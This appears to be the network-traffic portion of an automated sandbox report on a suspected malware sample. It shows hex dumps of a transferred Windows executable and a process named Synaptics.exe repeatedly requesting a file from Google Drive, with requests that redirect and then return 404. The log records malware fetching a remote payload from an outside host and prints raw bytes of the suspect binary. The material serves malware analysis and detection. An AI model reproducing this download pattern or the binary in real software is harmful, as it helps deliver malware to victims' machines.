                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: ff ff cc 83 44 24 04 f8 e9 e9 54 00 00 83 44 24 04 f8 e9 07 55 00 00 83 44 24 04 f8 e9 11 55 00 00 cc cc 65 11 40 00 6f 11 40 00 79 11 40 00 01 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 85 11 40 00 08 00 00 00 00 00 00 00 8d 40 00 00 12 40 00 91 11 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 40 00 0c 00 00 00 c0 10 40 00 34 3e 40 00 2c 66 40 00 38 66 40 00 48 3e 40 00 3c 3e 40 00 48 66 40 00 a0 3b 40 00 dc 3b 40 00 11 54 49 6e 74 65 72 66 61 63 65 64 4f 62 6a 65 63 74 8b c0 18 12 40 00 04 09 54 44 61 74 65 54 69 6d 65 01 ff 25 88 02 4a 00 8b c0 ff 25 84 02 4a 00 8b c0 ff 25 80 02 4a 00 8b c0 ff 25 7c 02 4a 00 8b c0 ff 25 78 02 4a 00 8b c0 ff 25 74 02 4a 00 8b c0 ff 25 70 02 4a 00 8b c0 ff 25 6c 02 4a
                                                                                                                              Data Ascii: D$TD$UD$Ue@o@y@F@@@@@@4>@,f@8f@H>@<>@Hf@;@;@TInterfacedObject@TDateTime%J%J%J%|J%xJ%tJ%pJ%lJ
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 3b ee 77 46 8b c6 03 43 0c 3b 44 24 10 77 3b 3b 74 24 08 73 04 89 74 24 08 8b c6 03 43 0c 3b 44 24 0c 76 04 89 44 24 0c 68 00 80 00 00 6a 00 56 e8 ef fc ff ff 85 c0 75 0a c7 05 c8 e5 49 00 01 00 00 00 8b c3 e8 8a fd ff ff 8b df 81 fb ec e5 49 00 75 a7 8b 44 24 04 33 d2 89 10 83 7c 24 0c 00 74 19 8b 44 24 04 8b 54 24 08 89 10 8b 44 24 0c 2b 44 24 08 8b 54 24 04 89 42 04 83 c4 14 5d 5f 5e 5b c3 53 56 57 55 83 c4 f4 89 4c 24 04 89 14 24 8b d0 8b ea 81 e5 00 f0 ff ff 03 14 24 81 c2 ff 0f 00 00 81 e2 00 f0 ff ff 89 54 24 08 8b 44 24 04 89 28 8b 44 24 08 2b c5 8b 54 24 04 89 42 04 8b 35 ec e5 49 00 eb 3c 8b 5e 08 8b 7e 0c 03 fb 3b eb 76 02 8b dd 3b 7c 24 08 76 04 8b 7c 24 08 3b fb 76 1e 6a 04 68 00 10 00 00 2b fb 57 53 e8 26 fc ff ff 85 c0 75 0a 8b 44 24 04 33
                                                                                                                              Data Ascii: ;wFC;D$w;;t$st$C;D$vD$hjVuIIuD$3|$tD$T$D$+D$T$B]_^[SVWUL$$$T$D$(D$+T$B5I<^~;v;|$v|$;vjh+WS&uD$3
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: e8 d5 f7 ff ff 68 cc e5 49 00 e8 d3 f7 ff ff c3 e9 05 27 00 00 eb db 5b 5d c3 53 3b 05 18 e6 49 00 75 09 8b 50 04 89 15 18 e6 49 00 8b 50 04 8b 48 08 81 f9 00 10 00 00 7f 38 3b c2 75 17 85 c9 79 03 83 c1 03 c1 f9 02 a1 24 e6 49 00 33 d2 89 54 88 f4 eb 24 85 c9 79 03 83 c1 03 c1 f9 02 8b 1d 24 e6 49 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 e6 49 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 e6 49 00 75 e8 c7 05 c8 e5 49 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 b9 01 00 00 5b c3 83 fa 04 7c 0c 8b ca 81 c9 02 00 00 80 89 08 89 0b 5b c3 ff 05 b4 e5 49 00 8b d0 83 ea 04 8b 12 81 e2 fc ff ff 7f 83 ea 04 01 15 b8 e5 49 00 e8 f3 05 00 00
                                                                                                                              Data Ascii: hI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|[II
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 55 8b ec 83 c4 f8 53 56 57 8b d8 80 3d c4 e5 49 00 00 75 09 e8 fb f8 ff ff 84 c0 74 08 81 fb f8 ff ff 7f 7e 0a 33 c0 89 45 fc e9 54 01 00 00 33 c9 55 68 04 23 40 00 64 ff 31 64 89 21 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 20 f2 ff ff 83 c3 07 83 e3 fc 83 fb 0c 7d 05 bb 0c 00 00 00 81 fb 00 10 00 00 0f 8f 93 00 00 00 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 15 24 e6 49 00 8b 54 82 f4 85 d2 74 79 8b f2 8b c6 03 c3 83 20 fe 8b 42 04 3b d0 75 1a 8b c3 85 c0 79 03 83 c0 03 c1 f8 02 8b 0d 24 e6 49 00 33 ff 89 7c 81 f4 eb 26 8b cb 85 c9 79 03 83 c1 03 c1 f9 02 8b 3d 24 e6 49 00 89 44 8f f4 8b 0a 89 4d f8 8b 4d f8 89 41 04 8b 4d f8 89 08 8b c6 8b 52 08 83 ca 02 89 10 83 c0 04 89 45 fc ff 05 b4 e5 49 00 83 eb 04 01 1d b8 e5 49 00 e8 a2 21 00 00 e9 84 00 00 00
                                                                                                                              Data Ascii: USVW=Iut~3ET3Uh#@d1d!=MIthI }y$ITty B;uy$I3|&y=$IDMMAMREII!
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: c0 74 05 89 5d fc eb 36 8b c6 e8 8f fa ff ff 8b f8 8b c3 83 e8 04 8b 00 25 fc ff ff 7f 83 e8 04 3b f0 7d 02 8b c6 85 ff 74 11 8b d7 8b cb 91 e8 be 02 00 00 8b c3 e8 f3 fb ff ff 89 7d fc 33 c0 5a 59 59 64 89 10 68 50 27 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 b8 ec ff ff c3 e9 f2 1b 00 00 eb e5 8b 45 fc 5f 5e 5b 59 5d c3 8d 40 00 53 85 c0 7e 15 ff 15 44 b0 49 00 8b d8 85 db 75 0b b0 01 e8 44 01 00 00 eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 48 b0 49 00 8b d8 85 db 74 0b b0 02 e8 24 01 00 00 eb 02 33 db 8b c3 5b c3 8b 08 85 c9 74 32 85 d2 74 18 50 89 c8 ff 15 4c b0 49 00 59 09 c0 74 19 89 01 c3 b0 02 e9 fa 00 00 00 89 10 89 c8 ff 15 48 b0 49 00 09 c0 75 eb c3 b0 01 e9 e4 00 00 00 85 d2 74 10 50 89 d0 ff 15 44 b0 49 00 59 09 c0 74 e7 89 01 c3
                                                                                                                              Data Ascii: t]6%;}t}3ZYYdhP'@=MIthIE_^[Y]@S~DIuD3[StHIt$3[t2tPLIYtHIutPDIYt
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40 00 33 c0 c3 90 53 56 51 8b d8 8b 73 0c 85 f6 75 04 33 c0 eb 26 6a 00 8d 44 24 04 50 56 8b 43 14 50 8b 03 50 e8 54 e5 ff ff 85 c0 75 07 e8 a3 e5 ff ff eb 02 33 c0 33 d2 89 53 0c 5a 5e 5b c3 8b c0 53 8b d8 53 e8 db e4 ff ff 48 0f
                                                                                                                              Data Ascii: ,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@3SVQsu3&jD$PVCPPTu33SZ^[SSH
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a 48 01 3a 4a 01 75 25 4e 74 08 8a 48 02 3a 4a 02 75 1a 31 c0 5e 5b c3 5e 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5e 5b c3 90 66 81 78 04 b1 d7 75 1d 8b 50 0c 3b 50 10 73 15 03 50 14 66 f7 40 06 01 00 74 19 8a 0a 80 f9 1a 75 12 b0 01 c3 50 e8 d1 00 00 00 5a 80 fc 1a 74 f1 ff 4a 0c 31 c0 c3 90 53 56 8b d8 83 ce ff 66 8b 43 04 66 3d b0 d7 76 29 66 3d b3 d7 77 23 6a 00 8b 03 50 e8 b3 df ff ff 8b f0 83 fe ff 75 07 e8 5f f6 ff ff eb 15 8b c6 33 d2 f7 73 08 8b f0 eb 0a b8 67 00 00 00 e8 38 f6 ff ff 8b
                                                                                                                              Data Ascii: 8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:Ju%NtH:Ju1^[^8u8u8u8^[fxuP;PsPf@tuPZtJ1SVfCf=v)f=w#jPu_3sg8
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 08 04 39 5f 5b c3 8b c0 56 57 89 c6 89 d7 81 e1 ff 00 00 00 f3 a6 5f 5e c3 8d 40 00 8a 2a 42 08 28 40 fe c9 75 f6 c3 90 e9 03 00 00 00 c3 8b c0 53 31 db 85 c0 7c 4d 0f 84 9a 00 00 00 3d 00 14 00 00 0f 8d 81 00 00 00 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de c9 c1 e8 05 74 79 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de c9 c1 e8 04 74 61 8d 04 80 db ac 43 bf 39 40 00 de c9 eb 53 f7 d8 3d 00 14 00 00 7d 46 89 c2 83 e2 1f 8d 14 92 db ac 53 f3 37 40 00 de f9 c1 e8 05 74 34 89 c2 83 e2 0f 74 0c 8d 14 92 db ac 53 29 39 40 00 de f9 c1 e8 04 74 1c 8d 04 80 db ac 43 bf 39 40 00 de f9 eb 0e dd d8 db ab e9 37 40 00 eb 04 dd d8 d9 ee 5b c3 00 00 00 00 00 00 00 80 ff 7f 00 00 00 00 00 00 00 80 ff 3f 00 00 00 00 00 00 00 a0 02 40 00 00 00 00 00 00 00 c8
                                                                                                                              Data Ascii: 9_[VW_^@*B(@uS1|M=S7@tytS)9@taC9@S=}FS7@t4tS)9@tC9@7@[?@
                                                                                                                              2024-12-30 10:47:35 UTC1378INData Raw: 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b 55 f8 8b c6 e8 bc 28 00 00 83 3e 00 0f 95 c3 33 c0 5a 59 59 64 89 10 68 2b 3d 40 00 8d 45 f8 e8 89 28 00 00 c3 e9 17 06 00 00 eb f0 8b c3 5f 5e 5b 59 59 5d c3 53 56 89 c3 8b 43 b8 85 c0 74 29 8b 08 83 c0 04 8b 32 3b 30 75 18 8b 72 04 3b 70 04 75 10 8b 72 08 3b 70 08 75 08 8b 72 0c 3b 70 0c 74 13 83 c0 1c 49 75 dc 8b 5b dc 85 db 74 04 8b 1b
                                                                                                                              Data Ascii: sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSrU(>3ZYYdh+=@E(_^[YY]SVCt)2;0ur;pur;pur;ptIu[t


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              1192.168.2.449744142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:01 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JjA9rFMLKEmgAOfzmsHvJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              2192.168.2.449743142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:01 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-HCAsLYddsxsen9wEiKzzrA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.449750142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:02 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-30 10:48:02 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC7rVb56kWIUGEPmBMlYQwC6A6G1Vd9XqSVkka3xjOatZW_FzrzB9TXITNbjbtLRWZvXn6nWVcE
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:02 GMT
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-IegQaAnFp37VGCaLXp_HPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Set-Cookie: NID=520=JGnwI_MrsxSh5MBfXa7e5IGnwl-ptwajyonA18zaUTPq55C8vR_TGrQg_gtonkz49RyPV0DRYh4IJ4Mmnf7-zS-qApMkY5BYyO3wNjs_yfOU5ow0eVQUHfXqysZHTtoGjzn2_o1eI9UD6xsuiOh_cDgmkMUYU6VIgwjj-O3VN1-XW24tC42u91c; expires=Tue, 01-Jul-2025 10:48:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:02 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 33 68 74 47 64 46 72 42 65 6c 73 5a 45 72 47 39 51 4f 66 42 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H3htGdFrBelsZErG9QOfBw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                              2024-12-30 10:48:02 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.449749142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              2024-12-30 10:48:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:02 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-L_SsGqylppEMw9fHsfrPyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.449751142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:02 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              2024-12-30 10:48:02 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC6PGaNEjSf0r3jOLaNdNdIuIyGDeiMC_WVsTyyPPxC6Zlu-ApKtt_lX8B4SRy02Bk0W
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:02 GMT
                                                                                                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1fHraLoSn_iJxvBlDZLC6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Set-Cookie: NID=520=Lg--Z3MNSR6dPItDRtKtP1r9cxxvxAnqX_seVCI6-qswVZogoBMsy20UdoyvolgY4jsXxa03MypjCddOfLfnmlLI7lN7IlZduEZIatbBpXtzPJ8etFv4N6IpLm-XEEoTbE_64lHHATt3pCnDxEKnJ_69QRAFEoyKi-Yzj7JKmhP1M6ERhD7W0_8; expires=Tue, 01-Jul-2025 10:48:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:02 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 74 54 77 65 6b 64 58 7a 35 39 74 32 57 5a 6d 61 43 63 68 4a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rtTwekdXz59t2WZmaCchJQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                              2024-12-30 10:48:02 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.449752142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
